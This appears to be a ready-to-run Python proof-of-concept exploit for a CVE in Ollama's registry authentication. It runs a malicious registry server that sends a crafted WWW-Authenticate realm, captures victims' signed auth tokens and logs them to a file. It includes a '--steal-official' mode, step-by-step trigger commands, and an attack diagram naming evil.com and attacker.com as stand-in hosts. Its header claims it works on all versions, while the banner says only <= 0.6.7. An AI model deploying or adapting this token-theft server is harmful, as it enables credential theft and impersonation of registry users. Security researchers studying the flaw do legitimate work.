README.md
Rendering markdown...
#!/usr/bin/env python3
"""CVE-2025-51471 - Ollama Token Theft PoC (works on all Ollama versions)"""
# Author: ajtazer
import argparse
import json
import logging
import sys
import os
import ssl
import subprocess
import tempfile
from datetime import datetime
from typing import Dict, List, Any, Optional
from dataclasses import dataclass, asdict
from flask import Flask, request, Response, jsonify
# ═══════════════════════════════════════════════════════════════════════════════
# ANSI COLOR CODES FOR TERMINAL OUTPUT
# ═══════════════════════════════════════════════════════════════════════════════
class Colors:
"""ANSI color codes for pretty terminal output."""
RESET = "\033[0m"
BOLD = "\033[1m"
DIM = "\033[2m"
UNDERLINE = "\033[4m"
# Regular colors
RED = "\033[31m"
GREEN = "\033[32m"
YELLOW = "\033[33m"
BLUE = "\033[34m"
PURPLE = "\033[35m"
CYAN = "\033[36m"
WHITE = "\033[37m"
# Bright colors
BRIGHT_RED = "\033[91m"
BRIGHT_GREEN = "\033[92m"
BRIGHT_YELLOW = "\033[93m"
BRIGHT_BLUE = "\033[94m"
BRIGHT_PURPLE = "\033[95m"
BRIGHT_CYAN = "\033[96m"
# Background colors
BG_RED = "\033[41m"
BG_GREEN = "\033[42m"
BG_YELLOW = "\033[43m"
# ═══════════════════════════════════════════════════════════════════════════════
# DATA STRUCTURES
# ═══════════════════════════════════════════════════════════════════════════════
@dataclass
class StolenToken:
"""Represents a captured authentication token with full metadata."""
timestamp: str
authorization: str
method: str
path: str
remote_addr: str
user_agent: Optional[str]
headers: Dict[str, str]
query_params: Dict[str, str]
def to_dict(self) -> Dict[str, Any]:
return asdict(self)
@dataclass
class ServerConfig:
"""Server configuration settings."""
port: int = 8080
capture_url: Optional[str] = None
log_file: str = "stolen_tokens.json"
steal_official: bool = False
verbose: bool = True
def __post_init__(self):
if self.capture_url is None:
self.capture_url = f"http://localhost:{self.port}/v2/token"
# ═══════════════════════════════════════════════════════════════════════════════
# GLOBAL STATE
# ═══════════════════════════════════════════════════════════════════════════════
app = Flask(__name__)
config: ServerConfig = ServerConfig()
stolen_tokens: List[StolenToken] = []
request_counter: int = 0
# ═══════════════════════════════════════════════════════════════════════════════
# LOGGING & OUTPUT UTILITIES
# ═══════════════════════════════════════════════════════════════════════════════
def print_banner():
"""Print the exploit banner with vulnerability information."""
banner = f"""
{Colors.BRIGHT_CYAN}╔═══════════════════════════════════════════════════════════════════════════════╗
║ ║
║ {Colors.BRIGHT_RED}██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ███████╗ {Colors.BRIGHT_CYAN}║
║ {Colors.BRIGHT_RED}██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██╔════╝ {Colors.BRIGHT_CYAN}║
║ {Colors.BRIGHT_RED}██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████╗ {Colors.BRIGHT_CYAN}║
║ {Colors.BRIGHT_RED}██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║ {Colors.BRIGHT_CYAN}║
║ {Colors.BRIGHT_RED}╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗███████║ {Colors.BRIGHT_CYAN}║
║ {Colors.BRIGHT_RED} ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚══════╝ {Colors.BRIGHT_CYAN}║
║ ║
║ {Colors.BRIGHT_YELLOW} ┌─────────────────────────────────────┐ {Colors.BRIGHT_CYAN}║
║ {Colors.BRIGHT_YELLOW} │ OLLAMA TOKEN THEFT PoC (v0.6.7) │ {Colors.BRIGHT_CYAN}║
║ {Colors.BRIGHT_YELLOW} │ Cross-Domain Token Exposure │ {Colors.BRIGHT_CYAN}║
║ {Colors.BRIGHT_YELLOW} └─────────────────────────────────────┘ {Colors.BRIGHT_CYAN}║
║ ║
╠═══════════════════════════════════════════════════════════════════════════════╣
║ {Colors.WHITE}Affected:{Colors.RESET} Ollama <= 0.6.7 {Colors.BRIGHT_CYAN}║
║ {Colors.WHITE}CVSS Score:{Colors.RESET} 6.9 (Medium) - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N{Colors.BRIGHT_CYAN}║
║ {Colors.WHITE}CWE:{Colors.RESET} CWE-345 (Insufficient Verification of Data Authenticity) {Colors.BRIGHT_CYAN}║
║ {Colors.WHITE}Component:{Colors.RESET} server.auth.getAuthorizationToken {Colors.BRIGHT_CYAN}║
╚═══════════════════════════════════════════════════════════════════════════════╝{Colors.RESET}
"""
print(banner)
def print_attack_flow():
"""Print a visual representation of the attack flow."""
flow = f"""
{Colors.BRIGHT_YELLOW}┌─────────────────────────────────────────────────────────────────────────────┐
│ ATTACK FLOW DIAGRAM │
└─────────────────────────────────────────────────────────────────────────────┘{Colors.RESET}
{Colors.CYAN}┌─────────────┐{Colors.RESET} {Colors.RED}┌──────────────────┐{Colors.RESET}
{Colors.CYAN}│ VICTIM │{Colors.RESET} {Colors.RED}│ MALICIOUS SERVER │{Colors.RESET}
{Colors.CYAN}│ (Ollama) │{Colors.RESET} {Colors.RED}│ (This PoC) │{Colors.RESET}
{Colors.CYAN}└──────┬──────┘{Colors.RESET} {Colors.RED}└────────┬─────────┘{Colors.RESET}
│ │
│ {Colors.GREEN}1. ollama pull evil.com/model{Colors.RESET} │
├────────────────────────────────────────────────────►
│ │
│ {Colors.YELLOW}2. HTTP 401 Unauthorized{Colors.RESET} │
│ {Colors.YELLOW}WWW-Authenticate: Bearer{Colors.RESET} │
│ {Colors.RED}realm="https://attacker.com/steal-token"{Colors.RESET} │
◄────────────────────────────────────────────────────┤
│ │
│ {Colors.BRIGHT_RED}3. Ollama follows realm WITHOUT validation!{Colors.RESET} │
│ {Colors.BRIGHT_RED}Sends Ed25519 signed token to attacker{Colors.RESET} │
├────────────────────────────────────────────────────►
│ │
│ {Colors.BG_RED}{Colors.WHITE} TOKEN CAPTURED! {Colors.RESET} │
│ │
▼ ▼
"""
print(flow)
def print_section(title: str, color: str = Colors.BRIGHT_CYAN):
"""Print a section header."""
width = 77
print(f"\n{color}{'═' * width}")
print(f" {title}")
print(f"{'═' * width}{Colors.RESET}\n")
def print_info(label: str, value: str, indent: int = 4):
"""Print an info line with label and value."""
spaces = " " * indent
print(f"{spaces}{Colors.DIM}├──{Colors.RESET} {Colors.YELLOW}{label}:{Colors.RESET} {value}")
def print_last_info(label: str, value: str, indent: int = 4):
"""Print the last info line in a section."""
spaces = " " * indent
print(f"{spaces}{Colors.DIM}└──{Colors.RESET} {Colors.YELLOW}{label}:{Colors.RESET} {value}")
def print_headers(headers: Dict[str, str], indent: int = 8):
"""Print HTTP headers in a formatted way."""
spaces = " " * indent
items = list(headers.items())
for i, (key, value) in enumerate(items):
prefix = "└──" if i == len(items) - 1 else "├──"
# Truncate long values
display_value = value if len(value) < 60 else value[:57] + "..."
print(f"{spaces}{Colors.DIM}{prefix}{Colors.RESET} {Colors.BLUE}{key}:{Colors.RESET} {display_value}")
def log_stolen_token(token: StolenToken):
"""Log a stolen token with detailed output."""
global stolen_tokens
stolen_tokens.append(token)
# Calculate token number
token_num = len(stolen_tokens)
# Print capture notification
print(f"\n{Colors.BG_RED}{Colors.WHITE}{Colors.BOLD}")
print(" ╔═══════════════════════════════════════════════════════════════════════╗")
print(f" ║ 🔓 TOKEN #{token_num} CAPTURED! 🔓 ║")
print(" ╚═══════════════════════════════════════════════════════════════════════╝")
print(f"{Colors.RESET}\n")
# Token details
print(f" {Colors.BRIGHT_GREEN}┌─────────────────────────────────────────────────────────────────────┐{Colors.RESET}")
print(f" {Colors.BRIGHT_GREEN}│{Colors.RESET} {Colors.BOLD}STOLEN TOKEN DETAILS{Colors.RESET} {Colors.BRIGHT_GREEN}│{Colors.RESET}")
print(f" {Colors.BRIGHT_GREEN}└─────────────────────────────────────────────────────────────────────┘{Colors.RESET}")
print_info("Timestamp", token.timestamp)
print_info("Remote Address", token.remote_addr)
print_info("HTTP Method", token.method)
print_info("Request Path", token.path)
print_info("User-Agent", token.user_agent or "N/A")
print()
# The prize - the authorization token
print(f" {Colors.BRIGHT_RED}┌─────────────────────────────────────────────────────────────────────┐{Colors.RESET}")
print(f" {Colors.BRIGHT_RED}│{Colors.RESET} {Colors.BOLD}AUTHORIZATION TOKEN (Ed25519 Signed){Colors.RESET} {Colors.BRIGHT_RED}│{Colors.RESET}")
print(f" {Colors.BRIGHT_RED}└─────────────────────────────────────────────────────────────────────┘{Colors.RESET}")
# Split token for readability if it's long
auth_token = token.authorization
if len(auth_token) > 70:
print(f"\n {Colors.GREEN}{auth_token[:70]}{Colors.RESET}")
remaining = auth_token[70:]
while remaining:
print(f" {Colors.GREEN}{remaining[:70]}{Colors.RESET}")
remaining = remaining[70:]
else:
print(f"\n {Colors.GREEN}{auth_token}{Colors.RESET}")
print()
# Headers if verbose
if config.verbose and token.headers:
print(f" {Colors.CYAN}┌─────────────────────────────────────────────────────────────────────┐{Colors.RESET}")
print(f" {Colors.CYAN}│{Colors.RESET} {Colors.BOLD}ALL REQUEST HEADERS{Colors.RESET} {Colors.CYAN}│{Colors.RESET}")
print(f" {Colors.CYAN}└─────────────────────────────────────────────────────────────────────┘{Colors.RESET}")
print_headers(token.headers)
print(f"\n{'─' * 77}\n")
# File logging
if config.log_file:
try:
with open(config.log_file, "a") as f:
json.dump(token.to_dict(), f, indent=2)
f.write("\n---\n")
if config.verbose:
print(f" {Colors.DIM}[✓] Token saved to {config.log_file}{Colors.RESET}\n")
except Exception as e:
print(f" {Colors.RED}[✗] Error writing to log file: {e}{Colors.RESET}\n")
def log_request(method: str, path: str, remote_addr: str, description: str, color: str = Colors.BLUE):
"""Log an incoming request with details."""
global request_counter
request_counter += 1
timestamp = datetime.now().strftime("%H:%M:%S.%f")[:-3]
print(f"\n{color}┌─ REQUEST #{request_counter} {'─' * 60}{Colors.RESET}")
print(f"{color}│{Colors.RESET} {Colors.DIM}[{timestamp}]{Colors.RESET} {Colors.BOLD}{method}{Colors.RESET} {path}")
print(f"{color}│{Colors.RESET} {Colors.DIM}From:{Colors.RESET} {remote_addr}")
print(f"{color}│{Colors.RESET} {Colors.DIM}Description:{Colors.RESET} {description}")
print(f"{color}└{'─' * 70}{Colors.RESET}")
# ═══════════════════════════════════════════════════════════════════════════════
# FLASK ROUTE HANDLERS
# ═══════════════════════════════════════════════════════════════════════════════
@app.route('/v2/', defaults={'path': ''})
@app.route('/v2/<path:path>')
def registry_handler(path):
"""
Handle requests to the fake OCI/Docker registry.
This endpoint simulates a malicious registry that exploits CVE-2025-51471
by returning a 401 response with a crafted WWW-Authenticate header containing
a malicious realm URL.
ATTACK MECHANISM:
1. Ollama sends a request to pull a model
2. We return 401 with WWW-Authenticate header pointing to our token capture endpoint
3. Ollama (vulnerable version) follows the realm URL without domain validation
4. We capture the Ed25519 signed authentication token
"""
log_request(
request.method,
request.url,
request.remote_addr,
"Fake registry request - checking for auth token",
Colors.BLUE
)
# Verbose header logging
if config.verbose:
print(f"\n {Colors.DIM}Request Headers:{Colors.RESET}")
for key, value in request.headers:
print(f" {Colors.DIM}•{Colors.RESET} {key}: {value[:50]}{'...' if len(value) > 50 else ''}")
# Check for Authorization header
auth_header = request.headers.get('Authorization')
if auth_header:
# 🎯 TOKEN RECEIVED! This is the payload we're after!
print(f"\n {Colors.BRIGHT_GREEN}[★] Authorization header detected!{Colors.RESET}")
print(f" {Colors.BRIGHT_GREEN}[★] Preparing to capture token...{Colors.RESET}")
token = StolenToken(
timestamp=datetime.now().isoformat(),
authorization=auth_header,
method=request.method,
path=request.url,
remote_addr=request.remote_addr,
user_agent=request.headers.get('User-Agent'),
headers=dict(request.headers),
query_params=dict(request.args)
)
log_stolen_token(token)
# Return 418 I'm a teapot as an indicator that capture succeeded
# This is a fun Easter egg status code that clearly shows the PoC worked
return Response(
json.dumps({
"message": "Token captured successfully",
"status": "pwned",
"token_number": len(stolen_tokens)
}, indent=2),
status=418,
content_type='application/json'
)
# No auth header - this is the initial request
# Send 401 with malicious WWW-Authenticate header
print(f"\n {Colors.YELLOW}[!] No Authorization header found{Colors.RESET}")
print(f" {Colors.YELLOW}[!] Sending malicious WWW-Authenticate response...{Colors.RESET}")
# Determine the realm URL
if config.steal_official:
realm = "https://registry.ollama.ai/v2/token"
print(f"\n {Colors.BRIGHT_RED}[⚠] STEALING OFFICIAL OLLAMA REGISTRY TOKENS!{Colors.RESET}")
print(f" {Colors.BRIGHT_RED}[⚠] Redirecting auth to: {realm}{Colors.RESET}")
else:
realm = config.capture_url
print(f"\n {Colors.PURPLE}[→] Redirecting auth to our capture endpoint:{Colors.RESET}")
print(f" {Colors.PURPLE} {realm}{Colors.RESET}")
# Craft the malicious WWW-Authenticate header
# This is the heart of the exploit - Ollama will follow this realm URL blindly
www_auth = f'Bearer realm="{realm}",service="ollama",scope="repository:malicious/model:pull"'
print(f"\n {Colors.CYAN}[→] WWW-Authenticate header:{Colors.RESET}")
print(f" {Colors.CYAN} {www_auth}{Colors.RESET}")
# Craft a realistic-looking registry error response
error_response = {
"errors": [{
"code": "UNAUTHORIZED",
"message": "authentication required",
"detail": {
"reason": "access to the requested resource is not authorized",
"realm": realm
}
}]
}
response = Response(
json.dumps(error_response, indent=2),
status=401,
content_type='application/json'
)
response.headers['WWW-Authenticate'] = www_auth
response.headers['Docker-Distribution-Api-Version'] = 'registry/2.0'
print(f"\n {Colors.GREEN}[✓] 401 response sent with malicious realm{Colors.RESET}")
print(f" {Colors.DIM}[...] Waiting for Ollama to follow the redirect...{Colors.RESET}")
return response
@app.route('/steal-token')
@app.route('/token')
@app.route('/v2/token')
def token_capture_handler():
"""
Token capture endpoint.
This is where Ollama sends the signed Ed25519 authentication token
after following our malicious realm URL.
The token is in the Authorization header and contains:
- The user's identity
- Ed25519 signature
- Scope information
With this token, an attacker could:
- Access private models the victim has access to
- Push malicious models under the victim's identity
- Impersonate the victim on registry.ollama.ai
"""
log_request(
request.method,
request.url,
request.remote_addr,
"🎯 TOKEN CAPTURE ENDPOINT HIT!",
Colors.BRIGHT_GREEN
)
auth_header = request.headers.get('Authorization')
if auth_header:
print(f"\n {Colors.BG_GREEN}{Colors.WHITE} SUCCESS! Token received at capture endpoint! {Colors.RESET}")
token = StolenToken(
timestamp=datetime.now().isoformat(),
authorization=auth_header,
method=request.method,
path=request.url,
remote_addr=request.remote_addr,
user_agent=request.headers.get('User-Agent'),
headers=dict(request.headers),
query_params=dict(request.args)
)
log_stolen_token(token)
else:
print(f"\n {Colors.YELLOW}[!] Request received but no Authorization header{Colors.RESET}")
print(f" {Colors.DIM} This might be a probe or the attack flow wasn't triggered{Colors.RESET}")
# Return 401 - the token capture is complete
# We don't need to return a valid token since we already captured what we need
return jsonify({
"error": "token_capture_complete",
"message": "Your token has been captured. This is a PoC for CVE-2025-51471.",
"captured_tokens": len(stolen_tokens)
}), 401
@app.route('/health')
def health_handler():
"""Health check endpoint for monitoring."""
return jsonify({
"status": "running",
"vulnerability": "CVE-2025-51471",
"affected_version": "Ollama <= 0.6.7",
"tokens_captured": len(stolen_tokens),
"total_requests": request_counter,
"server_time": datetime.now().isoformat(),
"config": {
"port": config.port,
"capture_url": config.capture_url,
"steal_official": config.steal_official,
"verbose": config.verbose
}
})
@app.route('/tokens')
def tokens_handler():
"""Return all captured tokens (for analysis)."""
return jsonify({
"total": len(stolen_tokens),
"tokens": [t.to_dict() for t in stolen_tokens]
})
@app.route('/')
def index_handler():
"""Root endpoint with usage information."""
return Response(f"""
╔═══════════════════════════════════════════════════════════════════════════════╗
║ CVE-2025-51471 - Ollama Token Theft PoC ║
║ Cross-Domain Authentication Token Exposure Server ║
╚═══════════════════════════════════════════════════════════════════════════════╝
STATUS: RUNNING
TOKENS CAPTURED: {len(stolen_tokens)}
REQUESTS HANDLED: {request_counter}
ENDPOINTS:
/v2/* - Fake registry (triggers exploit)
/v2/token - Token capture endpoint
/steal-token - Alternative token capture endpoint
/tokens - View all captured tokens (JSON)
/health - Server health check
EXPLOIT TRIGGER:
curl http://localhost:11434/api/pull -d '{{"model": "http://localhost:{config.port}/malicious/model"}}'
OR
ollama pull localhost:{config.port}/malicious/model
For more information, see: https://github.com/ollama/ollama/pull/10750
""", content_type='text/plain')
# ═══════════════════════════════════════════════════════════════════════════════
# SSL CERTIFICATE GENERATION
# ═══════════════════════════════════════════════════════════════════════════════
def generate_self_signed_cert(cert_dir: str = None) -> tuple:
"""
Generate a self-signed SSL certificate for HTTPS server.
Ollama requires HTTPS for registry connections, so we need to create
a self-signed certificate to serve as a malicious HTTPS registry.
Returns:
tuple: (cert_path, key_path)
"""
if cert_dir is None:
cert_dir = tempfile.mkdtemp(prefix="cve-2025-51471-")
cert_path = os.path.join(cert_dir, "server.crt")
key_path = os.path.join(cert_dir, "server.key")
print(f"\n{Colors.YELLOW}[*] Generating self-signed SSL certificate...{Colors.RESET}")
# Generate self-signed certificate using openssl
try:
# Generate private key and certificate in one command
cmd = [
"openssl", "req", "-x509", "-newkey", "rsa:4096",
"-keyout", key_path,
"-out", cert_path,
"-days", "365",
"-nodes", # No passphrase
"-subj", "/CN=localhost/O=CVE-2025-51471-PoC/C=US",
"-addext", "subjectAltName=DNS:localhost,IP:127.0.0.1"
]
result = subprocess.run(
cmd,
capture_output=True,
text=True
)
if result.returncode != 0:
# Try without -addext for older OpenSSL versions
cmd = [
"openssl", "req", "-x509", "-newkey", "rsa:2048",
"-keyout", key_path,
"-out", cert_path,
"-days", "365",
"-nodes",
"-subj", "/CN=localhost/O=CVE-2025-51471-PoC/C=US"
]
result = subprocess.run(cmd, capture_output=True, text=True)
if result.returncode != 0:
raise Exception(f"OpenSSL failed: {result.stderr}")
print(f"{Colors.GREEN}[✓] SSL certificate generated successfully{Colors.RESET}")
print(f"{Colors.DIM} ├── Certificate: {cert_path}{Colors.RESET}")
print(f"{Colors.DIM} └── Private Key: {key_path}{Colors.RESET}")
return cert_path, key_path
except FileNotFoundError:
print(f"{Colors.RED}[✗] OpenSSL not found! Please install OpenSSL.{Colors.RESET}")
print(f"{Colors.YELLOW}[!] Falling back to HTTP mode (may not work with Ollama){Colors.RESET}")
return None, None
except Exception as e:
print(f"{Colors.RED}[✗] Failed to generate certificate: {e}{Colors.RESET}")
print(f"{Colors.YELLOW}[!] Falling back to HTTP mode (may not work with Ollama){Colors.RESET}")
return None, None
# ═══════════════════════════════════════════════════════════════════════════════
# MAIN ENTRY POINT
# ═══════════════════════════════════════════════════════════════════════════════
def main():
global config
parser = argparse.ArgumentParser(
description='CVE-2025-51471 - Ollama Token Theft PoC Server',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
EXAMPLES:
# Basic usage (localhost token capture)
python3 malicious_registry.py
# Custom port
python3 malicious_registry.py --port 9000
# Steal official Ollama registry tokens
python3 malicious_registry.py --steal-official
# Minimal output
python3 malicious_registry.py --no-verbose
MORE INFORMATION:
Vulnerability: CVE-2025-51471
Affected: Ollama <= 0.6.7
Fix: https://github.com/ollama/ollama/pull/10750
"""
)
parser.add_argument(
'--port', '-p',
type=int,
default=8080,
help='Port to listen on (default: 8080)'
)
parser.add_argument(
'--capture-url', '-c',
type=str,
default=None,
help='URL for token capture endpoint (default: http://localhost:PORT/v2/token)'
)
parser.add_argument(
'--log', '-l',
type=str,
default='stolen_tokens.json',
help='File to log stolen tokens (default: stolen_tokens.json)'
)
parser.add_argument(
'--steal-official', '-s',
action='store_true',
help='Redirect to steal registry.ollama.ai tokens (DANGEROUS)'
)
parser.add_argument(
'--verbose', '-v',
action='store_true',
default=True,
help='Enable verbose output (default: True)'
)
parser.add_argument(
'--no-verbose',
action='store_true',
help='Disable verbose output'
)
parser.add_argument(
'--no-ssl',
action='store_true',
help='Disable HTTPS (use HTTP only - may not work with Ollama)'
)
parser.add_argument(
'--insecure',
action='store_true',
help='Same as --no-ssl'
)
args = parser.parse_args()
use_ssl = not (args.no_ssl or args.insecure)
protocol = "https" if use_ssl else "http"
# Build configuration
config = ServerConfig(
port=args.port,
capture_url=args.capture_url or f"{protocol}://localhost:{args.port}/v2/token",
log_file=args.log,
steal_official=args.steal_official,
verbose=not args.no_verbose
)
# Print banner and info
print_banner()
print_attack_flow()
# Generate SSL certificate if needed
cert_path, key_path = None, None
if use_ssl:
cert_path, key_path = generate_self_signed_cert()
if cert_path is None:
use_ssl = False
protocol = "http"
config.capture_url = f"http://localhost:{config.port}/v2/token"
print_section("SERVER CONFIGURATION")
print(f" {Colors.DIM}┌{'─' * 68}┐{Colors.RESET}")
print_info("Listen Port", str(config.port))
print_info("Protocol", f"{Colors.GREEN}HTTPS (SSL){Colors.RESET}" if use_ssl else f"{Colors.YELLOW}HTTP{Colors.RESET}")
print_info("Token Capture URL", config.capture_url)
print_info("Log File", config.log_file)
print_info("Steal Official Tokens", f"{Colors.RED}YES{Colors.RESET}" if config.steal_official else f"{Colors.GREEN}NO{Colors.RESET}")
print_last_info("Verbose Mode", f"{Colors.GREEN}ON{Colors.RESET}" if config.verbose else f"{Colors.YELLOW}OFF{Colors.RESET}")
print(f" {Colors.DIM}└{'─' * 68}┘{Colors.RESET}")
if config.steal_official:
print(f"\n{Colors.BG_RED}{Colors.WHITE}{Colors.BOLD}")
print(" ⚠️ WARNING: STEALING OFFICIAL OLLAMA REGISTRY TOKENS!")
print(" ⚠️ This will redirect auth flows to registry.ollama.ai")
print(" ⚠️ Use responsibly and only for authorized security testing!")
print(f"{Colors.RESET}")
if use_ssl:
print(f"\n{Colors.YELLOW}[!] IMPORTANT: Ollama needs to trust our self-signed certificate.{Colors.RESET}")
print(f"{Colors.YELLOW} You may need to add the certificate to your system trust store,{Colors.RESET}")
print(f"{Colors.YELLOW} OR restart this server with --no-ssl and use ollama's --insecure flag.{Colors.RESET}")
print_section("ATTACK INSTRUCTIONS")
if use_ssl:
print(f"""
{Colors.BRIGHT_RED}⚠️ HTTPS MODE - Certificate trust required{Colors.RESET}
{Colors.YELLOW}Option A:{Colors.RESET} Add the generated cert to your system keychain (macOS/Linux)
{Colors.YELLOW}Option B (RECOMMENDED):{Colors.RESET} Use HTTP mode instead:
{Colors.CYAN}$ python3 malicious_registry.py --no-ssl{Colors.RESET}
Then: {Colors.CYAN}$ ollama pull --insecure localhost:{config.port}/malicious/model{Colors.RESET}
""")
else:
print(f"""
{Colors.BRIGHT_GREEN}✓ HTTP MODE - Use --insecure flag with ollama{Colors.RESET}
{Colors.YELLOW}1.{Colors.RESET} Ensure Ollama is running:
{Colors.CYAN}$ ollama serve{Colors.RESET}
{Colors.YELLOW}2.{Colors.RESET} Trigger the vulnerability using the --insecure flag:
{Colors.BOLD}Method A - Using ollama CLI (RECOMMENDED):{Colors.RESET}
{Colors.CYAN}$ ollama pull --insecure localhost:{config.port}/malicious/model{Colors.RESET}
{Colors.BOLD}Method B - Using curl API:{Colors.RESET}
{Colors.CYAN}$ curl http://localhost:11434/api/pull -d '{{"model": "localhost:{config.port}/malicious/model", "insecure": true}}'{Colors.RESET}
{Colors.YELLOW}3.{Colors.RESET} Watch this terminal for captured tokens!
{Colors.YELLOW}4.{Colors.RESET} View all captured tokens:
{Colors.CYAN}$ curl http://localhost:{config.port}/tokens{Colors.RESET}
""")
print_section(f"SERVER STARTING ON PORT {config.port} ({protocol.upper()})")
print(f" {Colors.GREEN}🚀 Malicious registry server is now running!{Colors.RESET}")
print(f" {Colors.GREEN}📡 Listening on: {protocol}://0.0.0.0:{config.port}{Colors.RESET}")
print(f" {Colors.DIM}Press Ctrl+C to stop{Colors.RESET}")
print(f"\n{'═' * 77}\n")
# Disable Flask's default logging for cleaner output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
# Suppress Flask startup message
cli = sys.modules.get('flask.cli')
if cli:
cli.show_server_banner = lambda *args: None
try:
if use_ssl and cert_path and key_path:
# Run with HTTPS
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(cert_path, key_path)
app.run(host='0.0.0.0', port=config.port, debug=False, threaded=True, ssl_context=context)
else:
# Run with HTTP
app.run(host='0.0.0.0', port=config.port, debug=False, threaded=True)
except KeyboardInterrupt:
print(f"\n\n{Colors.YELLOW}[!] Server shutting down...{Colors.RESET}")
print(f"{Colors.GREEN}[✓] Total tokens captured: {len(stolen_tokens)}{Colors.RESET}")
if stolen_tokens:
print(f"{Colors.GREEN}[✓] Tokens saved to: {config.log_file}{Colors.RESET}")
print(f"{Colors.DIM}Goodbye!{Colors.RESET}\n")
if __name__ == '__main__':
main()